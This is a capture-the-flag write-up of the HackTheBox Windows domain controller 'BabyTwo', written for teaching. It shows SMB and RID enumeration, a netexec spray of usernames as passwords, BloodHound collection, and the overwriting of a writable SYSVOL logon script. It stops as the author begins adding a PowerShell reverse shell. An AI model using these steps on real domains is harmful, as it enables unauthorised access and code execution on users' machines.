BabyTwo

Another Windows box where I’ll try username as password and find two accounts. From those I’ll get access to the SYSVOL share, where I can poison a logon script to give me a reverse shell when the user logs in. That user has control over another service account that is meant to administer GPOs. I’ll abuse the GPO to get shell in the administrator’s group.

Box Info

Name BabyTwo BabyTwo
Play on HackTheBox
Release Date 25 Sep 2025
Retire Date 25 Sep 2025
OS Windows Windows
Base Points Medium [30]
First Blood User N/A (non-competitive)
First Blood Root N/A (non-competitive)
Creator xct
Scenario The User flag for this Box is located in a non-standard directory, C:.

Recon

Initial Scanning

nmap finds 21 open TCP ports:

oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.194.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-26 10:58 UTC
...[snip]...
Nmap scan report for 10.129.194.134
Host is up, received echo-reply ttl 127 (0.057s latency).
Scanned at 2025-09-26 10:58:37 UTC for 14s
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
3389/tcp  open  ms-wbt-server    syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
50123/tcp open  unknown          syn-ack ttl 127
50124/tcp open  unknown          syn-ack ttl 127
50142/tcp open  unknown          syn-ack ttl 127
50742/tcp open  unknown          syn-ack ttl 127
54965/tcp open  unknown          syn-ack ttl 127
54970/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.00 seconds
           Raw packets sent: 131059 (5.767MB) | Rcvd: 28 (1.216KB)
oxdf@hacky$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 -sCV 10.129.194.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-26 11:00 UTC
Nmap scan report for 10.129.194.134
Host is up (0.039s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-26 11:00:14Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: baby2.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.baby2.vl, DNS:baby2.vl, DNS:BABY2
| Not valid before: 2025-08-19T14:22:11
|_Not valid after:  2105-08-19T14:22:11
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.baby2.vl
| Not valid before: 2025-08-18T14:29:57
|_Not valid after:  2026-02-17T14:29:57
| rdp-ntlm-info:
|   Target_Name: BABY2
|   NetBIOS_Domain_Name: BABY2
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: baby2.vl
|   DNS_Computer_Name: dc.baby2.vl
|   DNS_Tree_Name: baby2.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-09-26T11:00:56+00:00
|_ssl-date: 2025-09-26T11:01:36+00:00; -4s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-09-26T11:01:01
|_  start_date: N/A
|_clock-skew: mean: -4s, deviation: 0s, median: -4s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.55 seconds

The box shows many of the ports associated with a Windows Domain Controller. The domain is baby2.vl, and the hostname is dc.

I’ll use netexec to make a hosts file entry and put it at the top of my /etc/hosts file:

oxdf@hacky$ netexec smb 10.129.194.134 --generate-hosts-file hosts
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
oxdf@hacky$ cat hosts 
10.129.194.134     DC.baby2.vl baby2.vl DC
oxdf@hacky$ cat hosts /etc/hosts | sudo sponge /etc/hosts

All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.

nmap notes our clocks are basically in sync. If there were a skew, I would want to sudo ntpdate dc.baby2.vl before any actions that use Kerberos auth.

SMB - TCP 445

Share Enumeration

The netexec run to generate the hosts file also showed that guest auth was enabled. I’ll use that to list shares:

oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --shares
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\guest: 
SMB         10.129.194.134  445    DC               [*] Enumerated shares
SMB         10.129.194.134  445    DC               Share           Permissions     Remark
SMB         10.129.194.134  445    DC               -----           -----------     ------
SMB         10.129.194.134  445    DC               ADMIN$                          Remote Admin
SMB         10.129.194.134  445    DC               apps            READ            
SMB         10.129.194.134  445    DC               C$                              Default share
SMB         10.129.194.134  445    DC               docs                            
SMB         10.129.194.134  445    DC               homes           READ,WRITE      
SMB         10.129.194.134  445    DC               IPC$            READ            Remote IPC
SMB         10.129.194.134  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.194.134  445    DC               SYSVOL                          Logon server share

BabyTwo has the Windows shares (ADMIN$, C$, and IPC$), the typical domain controller shares (NETLOGON and SYSVOL), as well as three custom shares (apps, docs, and homes).

The homes share has home directories for users:

oxdf@hacky$ smbclient -N //dc.baby2.vl/homes
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Sep 26 11:05:17 2025
  ..                                  D        0  Tue Aug 22 20:10:21 2023
  Amelia.Griffiths                    D        0  Tue Aug 22 20:17:06 2023
  Carl.Moore                          D        0  Tue Aug 22 20:17:06 2023
  Harry.Shaw                          D        0  Tue Aug 22 20:17:06 2023
  Joan.Jennings                       D        0  Tue Aug 22 20:17:06 2023
  Joel.Hurst                          D        0  Tue Aug 22 20:17:06 2023
  Kieran.Mitchell                     D        0  Tue Aug 22 20:17:06 2023
  library                             D        0  Tue Aug 22 20:22:47 2023
  Lynda.Bailey                        D        0  Tue Aug 22 20:17:06 2023
  Mohammed.Harris                     D        0  Tue Aug 22 20:17:06 2023
  Nicola.Lamb                         D        0  Tue Aug 22 20:17:06 2023
  Ryan.Jenkins                        D        0  Tue Aug 22 20:17:06 2023

                6126847 blocks of size 4096. 1930962 blocks available

I’ll look for files on each share with the spider_plus module for netexec:

oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' -M spider_plus
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\guest: 
SPIDER_PLUS 10.129.194.134  445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.194.134  445    DC               [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.194.134  445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.194.134  445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.194.134  445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.194.134  445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.194.134  445    DC               [*]  OUTPUT_FOLDER: /home/oxdf/.nxc/modules/nxc_spider_plus
SMB         10.129.194.134  445    DC               [*] Enumerated shares
SMB         10.129.194.134  445    DC               Share           Permissions     Remark
SMB         10.129.194.134  445    DC               -----           -----------     ------
SMB         10.129.194.134  445    DC               ADMIN$                          Remote Admin
SMB         10.129.194.134  445    DC               apps            READ            
SMB         10.129.194.134  445    DC               C$                              Default share
SMB         10.129.194.134  445    DC               docs                            
SMB         10.129.194.134  445    DC               homes           READ,WRITE      
SMB         10.129.194.134  445    DC               IPC$            READ            Remote IPC
SMB         10.129.194.134  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.194.134  445    DC               SYSVOL                          Logon server share 
SPIDER_PLUS 10.129.194.134  445    DC               [+] Saved share-file metadata to "/home/oxdf/.nxc/modules/nxc_spider_plus/10.129.194.134.json".
SPIDER_PLUS 10.129.194.134  445    DC               [*] SMB Shares:           8 (ADMIN$, apps, C$, docs, homes, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.194.134  445    DC               [*] SMB Readable Shares:  4 (apps, homes, IPC$, NETLOGON)
SPIDER_PLUS 10.129.194.134  445    DC               [*] SMB Writable Shares:  1 (homes)
SPIDER_PLUS 10.129.194.134  445    DC               [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.194.134  445    DC               [*] Total folders found:  12
SPIDER_PLUS 10.129.194.134  445    DC               [*] Total files found:    3
SPIDER_PLUS 10.129.194.134  445    DC               [*] File size average:    966.67 B
SPIDER_PLUS 10.129.194.134  445    DC               [*] File size min:        108 B
SPIDER_PLUS 10.129.194.134  445    DC               [*] File size max:        1.76 KB

I’ll move the output file to my local directory, and use jq to get a list of files in each share:

oxdf@hacky$ cat spider_plus.json | jq 'with_entries({key, value: (.value | keys)})'
{
  "NETLOGON": [
    "login.vbs"
  ],
  "apps": [
    "dev/CHANGELOG",
    "dev/login.vbs.lnk"
  ],
  "homes": []
}

I’ll use smbclient to get each of these. CHANGELOG has some notes about a tool:

[0.2]

- Added automated drive mapping

[0.1]

- Rolled out initial version of the domain logon script

I’ll use lnkparse3 (uv tool install lnkparse3) to see details on the lnk file:

oxdf@hacky$ lnkparse login.vbs.lnk
Windows Shortcut Information:
   Guid: 00021401-0000-0000-C000-000000000046
   Link flags: HasTargetIDList | HasLinkInfo | HasRelativePath | HasWorkingDir | IsUnicode | EnableTargetMetadata - (524443)
   File flags: FILE_ATTRIBUTE_ARCHIVE - (32)
   Creation time: 2023-08-22 19:28:18.552829+00:00
   Accessed time: 2023-09-02 14:55:51.994608+00:00
   Modified time: 2023-09-02 14:55:51.994608+00:00
   File size: 992
   Icon index: 0
   Windowstyle: SW_SHOWNORMAL
   Hotkey: UNSET - UNSET {0x0000}

   TARGET:
      Items:
      -  Root Folder:
            Sort index: My Computer
            Guid: 20D04FE0-3AEA-1069-A2D8-08002B30309D
      -  Volume Item:
            Flags: '0xf'
            Data: null
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 16
            Primary name: Windows
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 16
            Primary name: SYSVOL
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 16
            Primary name: sysvol
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 1040
            Primary name: baby2.vl
      -  File entry:
            Flags: Is directory
            File size: 0
            File attribute flags: 16
            Primary name: scripts
      -  File entry:
            Flags: Is file
            File size: 992
            File attribute flags: 32
            Primary name: login.vbs

   LINK INFO:
      Link info flags: 3
      Local base path: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts\
      Common path suffix: login.vbs
      Location info:
         Drive type: DRIVE_FIXED
         Drive serial number: '0xe6f32485'
         Volume label: ''
      Location: Local

   DATA:
      Relative path: ..\..\..\Windows\SYSVOL\sysvol\baby2.vl\scripts\login.vbs
      Working directory: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts

   EXTRA:
      SPECIAL FOLDER LOCATION BLOCK:
         Size: 16
         Special folder id: 36
         Offset: 131
      KNOWN FOLDER LOCATION BLOCK:
         Size: 28
         Known folder id: F38BF404-1D43-42F2-9305-67DE0B28FC23
         Offset: 131
      DISTRIBUTED LINK TRACKER BLOCK:
         Size: 96
         Length: 88
         Version: 0
         Machine identifier: dc
         Droid volume identifier: F73129F6-BEED-429A-88BA-9573971C9D61
         Droid file identifier: A6644D7E-411F-11EE-B012-000C29AF9E25
         Birth droid volume identifier: F73129F6-BEED-429A-88BA-9573971C9D61
         Birth droid file identifier: A6644D7E-411F-11EE-B012-000C29AF9E25
      METADATA PROPERTIES BLOCK:
         Size: 677
         Property store:
         -  Storage size: 133
            Version: '0x53505331'
            Format id: DABD30ED-0043-4789-A7F8-D013A4736622
            Serialized property values:
            -  Value size: 105
               Id: 100
               Value: scripts (C:\Windows\SYSVOL\sysvol\baby2.vl)
               Value type: VT_LPWSTR
         -  Storage size: 137
            Version: '0x53505331'
            Format id: 46588AE2-4CBC-4338-BBFC-139326986DCE
            Serialized property values:
            -  Value size: 109
               Id: 4
               Value: S-1-5-21-213243958-1766259620-4276976267-500
               Value type: VT_LPWSTR
         -  Storage size: 189
            Version: '0x53505331'
            Format id: B725F130-47EF-101A-A5F1-02608C9EEBAC
            Serialized property values:
            -  Value size: 37
               Id: 10
               Value: login.vbs
               Value type: VT_LPWSTR
            -  Value size: 21
               Id: 15
               Value: null
               Value type: VT_FILETIME
            -  Value size: 21
               Id: 12
               Value: null
               Value type: VT_UI8
            -  Value size: 61
               Id: 4
               Value: VBScript Script File
               Value type: VT_LPWSTR
            -  Value size: 21
               Id: 14
               Value: null
               Value type: VT_FILETIME
         -  Storage size: 149
            Version: '0x53505331'
            Format id: 28636AA6-953D-11D2-B5D6-00C04FD918D0
            Serialized property values:
            -  Value size: 121
               Id: 30
               Value: C:\Windows\SYSVOL\sysvol\baby2.vl\scripts\login.vbs
               Value type: VT_LPWSTR
         -  Storage size: 57
            Version: '0x53505331'
            Format id: 446D16B1-8DAD-4870-A748-402EA43D788C
            Serialized property values:
            -  Value size: 29
               Id: 104
               Value: null
               Value type: VT_CLSID

It links to login.vbs in C:\Windows\SYSVOL\sysvol\baby2.vl\scripts. login.vbs maps the apps and docs shares as the V: and L: drivers on a users machine.

Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")    
  
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
    
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
    
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    
    Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

Users

The guest account is not able to list users, but it can brute force by RID:

oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --users
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\guest:
oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --rid-brute
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\guest:
SMB         10.129.194.134  445    DC               498: BABY2\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.194.134  445    DC               500: BABY2\Administrator (SidTypeUser)
SMB         10.129.194.134  445    DC               501: BABY2\Guest (SidTypeUser)
SMB         10.129.194.134  445    DC               502: BABY2\krbtgt (SidTypeUser)
SMB         10.129.194.134  445    DC               512: BABY2\Domain Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               513: BABY2\Domain Users (SidTypeGroup)
SMB         10.129.194.134  445    DC               514: BABY2\Domain Guests (SidTypeGroup)
SMB         10.129.194.134  445    DC               515: BABY2\Domain Computers (SidTypeGroup)
SMB         10.129.194.134  445    DC               516: BABY2\Domain Controllers (SidTypeGroup)
SMB         10.129.194.134  445    DC               517: BABY2\Cert Publishers (SidTypeAlias)
SMB         10.129.194.134  445    DC               518: BABY2\Schema Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               519: BABY2\Enterprise Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               520: BABY2\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.194.134  445    DC               521: BABY2\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.194.134  445    DC               522: BABY2\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.194.134  445    DC               525: BABY2\Protected Users (SidTypeGroup)
SMB         10.129.194.134  445    DC               526: BABY2\Key Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               527: BABY2\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.194.134  445    DC               553: BABY2\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.194.134  445    DC               571: BABY2\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.194.134  445    DC               572: BABY2\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.194.134  445    DC               1000: BABY2\DC$ (SidTypeUser)
SMB         10.129.194.134  445    DC               1101: BABY2\DnsAdmins (SidTypeAlias)
SMB         10.129.194.134  445    DC               1102: BABY2\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.194.134  445    DC               1103: BABY2\gpoadm (SidTypeUser)
SMB         10.129.194.134  445    DC               1104: BABY2\office (SidTypeGroup)
SMB         10.129.194.134  445    DC               1105: BABY2\Joan.Jennings (SidTypeUser)
SMB         10.129.194.134  445    DC               1106: BABY2\Mohammed.Harris (SidTypeUser)
SMB         10.129.194.134  445    DC               1107: BABY2\Harry.Shaw (SidTypeUser)
SMB         10.129.194.134  445    DC               1108: BABY2\Carl.Moore (SidTypeUser)
SMB         10.129.194.134  445    DC               1109: BABY2\Ryan.Jenkins (SidTypeUser)
SMB         10.129.194.134  445    DC               1110: BABY2\Kieran.Mitchell (SidTypeUser)
SMB         10.129.194.134  445    DC               1111: BABY2\Nicola.Lamb (SidTypeUser)
SMB         10.129.194.134  445    DC               1112: BABY2\Lynda.Bailey (SidTypeUser)
SMB         10.129.194.134  445    DC               1113: BABY2\Joel.Hurst (SidTypeUser)
SMB         10.129.194.134  445    DC               1114: BABY2\Amelia.Griffiths (SidTypeUser)
SMB         10.129.194.134  445    DC               1602: BABY2\library (SidTypeUser)
SMB         10.129.194.134  445    DC               2601: BABY2\legacy (SidTypeGroup)

This includes all the users with home directories, and more. I’ll use this to make a users list:

oxdf@hacky$ netexec smb dc.baby2.vl -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 | tee users
Administrator
Guest
krbtgt
DC$
gpoadm
Joan.Jennings
Mohammed.Harris
Harry.Shaw
Carl.Moore
Ryan.Jenkins
Kieran.Mitchell
Nicola.Lamb
Lynda.Bailey
Joel.Hurst
Amelia.Griffiths
library

Shell as Amelia.Griffiths

Auth as library / Carl.Mooore

Vulnlabs really likes to showcase password attacks on Windows boxes. One of these is checking for users with their password being their username:

oxdf@hacky$ netexec smb dc.baby2.vl -u users -p users --no-bruteforce --continue-on-success 
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [-] baby2.vl\Administrator:Administrator STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\krbtgt:krbtgt STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\DC$:DC$ STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\gpoadm:gpoadm STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE 
SMB         10.129.194.134  445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE
SMB         10.129.194.134  445    DC               [+] baby2.vl\library:library 

Two users match!

BloodHound

I’ll use the library account to collect BloodHound data with netexec:

oxdf@hacky$ netexec ldap dc.baby2.vl -u library -p library --bloodhound -c All --dns-server 10.129.194.134
LDAP        10.129.194.134  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:baby2.vl) (signing:None) (channel binding:Never) 
LDAP        10.129.194.134  389    DC               [+] baby2.vl\library:library 
LDAP        10.129.194.134  389    DC               Resolved collection methods: session, dcom, psremote, localadmin, trusts, group, objectprops, container, rdp, acl
LDAP        10.129.194.134  389    DC               Done in 0M 4S
LDAP        10.129.194.134  389    DC               Compressing output into /home/oxdf/.nxc/logs/DC_10.129.194.134_2025-09-26_135355_bloodhound.zip

I’ll start the BloodHound-CE Docker and feed the data in, marking both users as owned. Neither shows anything interesting as far as outbound control.

Looking through the users, I’ll note that Amelia.Griffiths has an interesting Loginscript:

image-20250926095913185

SMB

Share Enumeration

While the guest account didn’t have access to SYSVOL, the library and Carl.Moore accounts do:

oxdf@hacky$ netexec smb dc.baby2.vl -u library -p library --shares
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\library:library 
SMB         10.129.194.134  445    DC               [*] Enumerated shares
SMB         10.129.194.134  445    DC               Share           Permissions     Remark
SMB         10.129.194.134  445    DC               -----           -----------     ------
SMB         10.129.194.134  445    DC               ADMIN$                          Remote Admin
SMB         10.129.194.134  445    DC               apps            READ,WRITE      
SMB         10.129.194.134  445    DC               C$                              Default share
SMB         10.129.194.134  445    DC               docs            READ,WRITE      
SMB         10.129.194.134  445    DC               homes           READ,WRITE      
SMB         10.129.194.134  445    DC               IPC$            READ            Remote IPC
SMB         10.129.194.134  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.194.134  445    DC               SYSVOL          READ            Logon server share 
oxdf@hacky$ netexec smb dc.baby2.vl -u Carl.Moore -p Carl.Moore --shares
SMB         10.129.194.134  445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB         10.129.194.134  445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         10.129.194.134  445    DC               [*] Enumerated shares
SMB         10.129.194.134  445    DC               Share           Permissions     Remark
SMB         10.129.194.134  445    DC               -----           -----------     ------
SMB         10.129.194.134  445    DC               ADMIN$                          Remote Admin
SMB         10.129.194.134  445    DC               apps            READ,WRITE      
SMB         10.129.194.134  445    DC               C$                              Default share
SMB         10.129.194.134  445    DC               docs            READ,WRITE      
SMB         10.129.194.134  445    DC               homes           READ,WRITE      
SMB         10.129.194.134  445    DC               IPC$            READ            Remote IPC
SMB         10.129.194.134  445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.194.134  445    DC               SYSVOL          READ            Logon server share

I’ll connect to the homes share as both, but there’s nothing new.

SYSVOL

The SYSVOL share has the script pointed to by the lnk file:

oxdf@hacky$ smbclient //dc.baby2.vl/SYSVOL -U Carl.Moore%Carl.Moore
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 22 17:37:36 2023
  ..                                  D        0  Tue Aug 22 17:37:36 2023
  baby2.vl                           Dr        0  Tue Aug 22 17:37:36 2023

                6126847 blocks of size 4096. 1926165 blocks available
smb: \> cd baby2.vl\
smb: \baby2.vl\> ls
  .                                   D        0  Tue Aug 22 17:43:55 2023
  ..                                  D        0  Tue Aug 22 17:37:36 2023
  DfsrPrivate                      DHSr        0  Tue Aug 22 17:43:55 2023
  Policies                            D        0  Tue Aug 22 17:37:41 2023
  scripts                             D        0  Mon Aug 25 08:30:39 2025

                6126847 blocks of size 4096. 1926165 blocks available
smb: \baby2.vl\> cd scripts\
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Mon Aug 25 08:30:39 2025
  ..                                  D        0  Tue Aug 22 17:43:55 2023
  login.vbs                           A      992  Sat Sep  2 14:55:51 2023

                6126847 blocks of size 4096. 1926165 blocks available

Interestingly, not only can I read it, but I can write it (despire netexec saying this was read only access):

smb: \baby2.vl\scripts\> put hosts login.vbs
putting file hosts as \baby2.vl\scripts\login.vbs (0.6 kb/s) (average 0.6 kb/s)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Mon Aug 25 08:30:39 2025
  ..                                  D        0  Tue Aug 22 17:43:55 2023
  login.vbs                           A       43  Fri Sep 26 13:30:36 2025

                6126847 blocks of size 4096. 1926165 blocks available

The size of the file changes from 992 to 43.

Poison login.vbs

I’ve already seen that Amelia.Griffiths uses login.vbs as a logon script. Even without seeing that, given the shortcut file pointing at this script on SYSVOL, it’s reasonable to make a guess that this script is run on login by users in the domain.

Since I can write it, I can add code to it. I’ll add VBscript that will call a PowerShell reverse shell (from revshells.com):

oxdf@hacky$ tail login-revshell.vbs 
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    
    Set objNetwork = Nothing
End Sub

Set cmdshell = CreateObject("Wscript.Shell")
